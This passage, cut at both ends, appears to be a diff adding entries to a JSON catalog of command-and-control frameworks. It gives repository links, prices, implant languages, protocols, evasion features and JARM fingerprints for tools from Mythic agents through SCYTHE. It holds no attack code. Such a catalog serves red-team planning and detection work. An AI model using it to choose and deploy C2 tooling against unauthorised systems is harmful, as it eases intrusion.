"No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "Encrypted Key Exchange", + "stego": "No", + "proxy_aware": "No", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb", + "actively_maint": "Yes", + "slack": "#ApFell bloodhoundgang.herokuapp.com", + "slack_members": "180", + "gh_issues": "14", + "notes": "" + }, + { + "name": "Mythic-Apollo", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/MythicAgents/Apollo", + "site": "", + "twitter": "@djhohnstein", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "Implant for Mythic" + }, + { + "name": "Mythic-Medusa", + "license": "NA", + "price": "NA", + "github": "https://github.com/MythicAgents/Medusa", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + 
"multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Nebula", + "license": "MIT", + "price": "NA", + "github": "https://github.com/gl4ssesbo1/Nebula", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Nighthawk", + "license": "Commercial", + "price": "\u00c2\u00a322,500", + "github": "", + "site": "https://www.mdsec.co.uk/nighthawk/", + "twitter": "@MDSecLabs", + "evaluator": "@domchell", + "date": "12/16/2021", + "version": "0.1", + "implementation": "Binary", + "how_to": "", + "slingshot": 
"", + "kali": "", + "server": "Python", + "implant": "C++", + "multi_user": "Yes", + "ui": "GUI", + "dark_mode": "No", + "api": "Yes", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "Yes", + "http2": "Yes", + "http3": "Yes", + "dns": "Yes", + "doh": "Yes", + "icmp": "Yes", + "ftp": "Yes", + "imap": "Yes", + "mapi": "Yes", + "smb": "Yes", + "ldap": "Yes", + "key_exchange": "Yes", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "Yes", + "attck_mapping": "No", + "dashboard": "Yes", + "blog": "No", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "Yes", + "slack_members": "NA", + "gh_issues": "NA", + "notes": "" + }, + { + "name": "Ninja", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/ahmedkhlief/Ninja/", + "site": "https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/", + "twitter": "", + "evaluator": "@leekirkpatrick4", + "date": "4/3/2020", + "version": "Beta", + "implementation": "python", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C#/PowerShell", + "multi_user": "Yes", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "AES", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", 
+ "slack_members": "NA", + "gh_issues": "4", + "notes": "Built on top of leaked MuddyC3" + }, + { + "name": "NorthStarC2", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/EnginDemirbilek/NorthStarC2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Nuages", + "license": "NA", + "price": "NA", + "github": "https://github.com/p3nt4/Nuages", + "site": "", + "twitter": "@xp3nt4", + "evaluator": "@xp3nt4", + "date": "11/12/2019", + "version": "1", + "implementation": "Node.Js", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C#", + "multi_user": "Yes", + "ui": "Cli", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "AES", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": 
"No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "Implants can be built and customized easily" + }, + { + "name": "Octopus", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/mhaskar/Octopus", + "site": "https://shells.systems/unveiling-octopus-the-pre-operation-c2-for-red-teamers/", + "twitter": "@mohammadaskar2", + "evaluator": "@jorgeorchilles", + "date": "12/12/2019", + "version": "v1.0 Beta", + "implementation": "pip3", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "PowerShell", + "multi_user": "No", + "ui": "GUI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "AES", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "Yes", + "attck_mapping": "Yes", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "3", + "notes": "" + }, + { + "name": "OffensiveNotion", + "license": "MIT", + "price": "NA", + "github": "https://github.com/mttaggart/OffensiveNotion", + "site": "", + "twitter": "@mttaggart @huskyhacksmk", + "evaluator": "", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + 
"doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "OST Stage 1", + "license": "Commercial", + "price": "Check Site", + "github": "", + "site": "https://outflank.nl/services/outflank-security-tooling/", + "twitter": "@OutflankNL", + "evaluator": "@MarcOverIP", + "date": "11/5/2021", + "version": "SaaS", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C++", + "multi_user": "Yes", + "ui": "GUI", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "", + "macos": "", + "tcp": "", + "http": "Yes", + "http2": "Yes", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "Yes", + "stego": "", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "", + "kill_date": "Yes", + "chaining": "", + "logging": "Yes", + "in_wild": "", + "attck_mapping": "Yes", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "Yes, private", + "slack_members": "", + "gh_issues": "", + "notes": "Focus on Stage 1 type of functionality. 
Available as part of larger OST offering with multiple initial access and post-ex capabilities" + }, + { + "name": "Oyabun C2", + "license": "Commercial", + "price": "$200", + "github": "", + "site": "https://redcodelabs.io/oyabun/", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Palinka", + "license": "NA", + "price": "NA", + "github": "https://github.com/lapolis/palinka_c2", + "site": "", + "twitter": "@l4p0lis", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", 
+ "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "PetaQ", + "license": "MIT", + "price": "NA", + "github": "https://github.com/fozavci/petaqc2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "PickleC2", + "license": "NA", + "price": "NA", + "github": "https://github.com/xRET2pwn/PickleC2", + "site": "https://picklec2.readthedocs.io/en/latest/", + "twitter": "@RET2_pwn", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "PowerShell", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", 
+ "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "PoshC2", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/nettitude/PoshC2/", + "site": "https://poshc2.readthedocs.io/en/latest/", + "twitter": "@Nettitude_Labs", + "evaluator": "@jorgeorchilles", + "date": "9/11/2021", + "version": "7.4.0", + "implementation": "install.sh", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": "Python", + "implant": "PowerShell/C#/Python", + "multi_user": "Yes", + "ui": "CLI", + "dark_mode": "Yes", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "", + "key_exchange": "TLS", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "Yes", + "kill_date": "Yes", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "Yes", + "attck_mapping": "Yes", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "2ad2ad0002ad2ad22c42d42d000000faabb8fd156aa8b4d8a37853e1063261", + "actively_maint": "Yes", + "slack": "poshc2.slack.com", + "slack_members": "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/", + "gh_issues": "44", + "notes": "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/" + }, + { + "name": "PowerHub", + "license": "MIT", + "price": "NA", + "github": "https://github.com/AdrianVollmer/PowerHub", + "site": "", + "twitter": "@mr_mitm", + "evaluator": "@jorgeorchilles", + "date": "11/15/2019", + "version": "1.3", + "implementation": "pip3", + "how_to": "Yes", + "slingshot": "", + "kali": "Yes", + "server": "Python", + "implant": "PowerShell", + "multi_user": 
"Yes", + "ui": "Web", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "TLS", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "38", + "notes": "" + }, + { + "name": "Prelude", + "license": "Commercial", + "price": "Check Site", + "github": "https://github.com/preludeorg/", + "site": "https://www.prelude.org/", + "twitter": "@preludeorg", + "evaluator": "@bfuzzy1", + "date": "1/15/2021", + "version": "0.9.12", + "implementation": "Binary", + "how_to": "No", + "slingshot": "No", + "kali": "No", + "server": "NodeJS", + "implant": "Go/Python/JS", + "multi_user": "No", + "ui": "GUI", + "dark_mode": "Yes", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "Pre-shared key/TLS", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "Yes", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "Yes", + "dashboard": "Yes", + "blog": "No", + "c2_matrix_indicators": "", + "jarm": "No", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "N/A", + "gh_issues": "6", + "notes": "Community is free, Professional $50 per user, Enterprise $1,000 a 
month up to 10 users" + }, + { + "name": "Prismatica", + "license": "MIT", + "price": "NA", + "github": "https://github.com/Project-Prismatica", + "site": "http://prismatica.io/", + "twitter": "@PPrismatica", + "evaluator": "@0sm0s1z", + "date": "11/13/2019", + "version": "0.01", + "implementation": "Docker", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Javascript/Python", + "implant": "JScript/.NET/Rust", + "multi_user": "Yes", + "ui": "GUI", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "1", + "notes": "" + }, + { + "name": "Proton", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/entynetproject/proton", + "site": "", + "twitter": "@enty8080", + "evaluator": "Contribute", + "date": "", + "version": "5", + "implementation": "install.sh", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "JScript/VBScript", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + 
"kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "No", + "slack_members": "NA", + "gh_issues": "4", + "notes": "" + }, + { + "name": "Pupy", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/n1nj4sec/pupy", + "site": "", + "twitter": "@n1nj4sec", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Python", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "Yes", + "attck_mapping": "Yes", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "596", + "notes": "" + }, + { + "name": "QuasarRAT", + "license": "MIT", + "price": "NA", + "github": "https://github.com/quasar/QuasarRAT", + "site": "", + "twitter": "", + "evaluator": "@leekirkpatrick4", + "date": "5/20/2020", + "version": "1.3.0.0", + "implementation": "C#", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "C#", + "implant": "C#", + "multi_user": "No", + "ui": "GUI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "No", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "TLS", + 
"stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "Yes", + "attck_mapping": "Yes", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "529", + "notes": "" + }, + { + "name": "RATel", + "license": "MIT", + "price": "NA", + "github": "https://github.com/FrenchCisco/RATel", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Red Team Toolkit", + "license": "Commercial", + "price": "$7,000", + "github": "", + "site": "https://www.netspi.com/technology/red-team-toolkit/", + "twitter": "@SilentBreakSec", + "evaluator": "@dmay3r", + "date": "11/22/2019", + "version": "2.63", + "implementation": "install.sh", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C++", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + 
"http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "", + "key_exchange": "Encrypted Key Exchange", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "NA", + "notes": "" + }, + { + "name": "RedHerd Framework", + "license": "MIT", + "price": "NA", + "github": "https://github.com/redherd-project/redherd-framework", + "site": "https://redherd.readthedocs.io", + "twitter": "@RedHerdProject", + "evaluator": "", + "date": "9/29/2021", + "version": "0.0.4", + "implementation": "JavaScript / Docker", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Node.js", + "implant": "NA", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "Yes", + "api": "Yes", + "windows": "Yes*", + "linux": "Yes*", + "macos": "Yes*", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "Yes (SSH)", + "stego": "NA", + "proxy_aware": "NA", + "domainfront": "NA", + "custom_profile": "NA", + "jitter": "NA", + "working_hours": "NA", + "kill_date": "NA", + "chaining": "NA", + "logging": "No", + "in_wild": "", + "attck_mapping": "Yes**", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "No", + "gh_issues": "", + "notes": "(*) Implant refers to the supported OS for the assets. (**) ATT&CK Mapping is easly integrated through custom topics, the default is CKC Mapping." 
+ }, + { + "name": "redViper", + "license": "NA", + "price": "NA", + "github": "https://github.com/itsKindred/redViper", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "" + }, + { + "name": "ReverseTCPShell", + "license": "NA", + "price": "NA", + "github": "https://github.com/ZHacker13/ReverseTCPShell", + "site": "", + "twitter": "@ZHacker13", + "evaluator": "@jorgeorchilles", + "date": "12/19/2019", + "version": "NA", + "implementation": "PowerShell", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "PowerShell", + "implant": "PowerShell", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "No", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + 
"blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "Direct, constant TCP connection" + }, + { + "name": "sak1to-shell", + "license": "NA", + "price": "NA", + "github": "https://github.com/d4rk007/sak1to-shell", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "SCYTHE", + "license": "Commercial", + "price": "Contact Sales", + "github": "https://github.com/scythe-io", + "site": 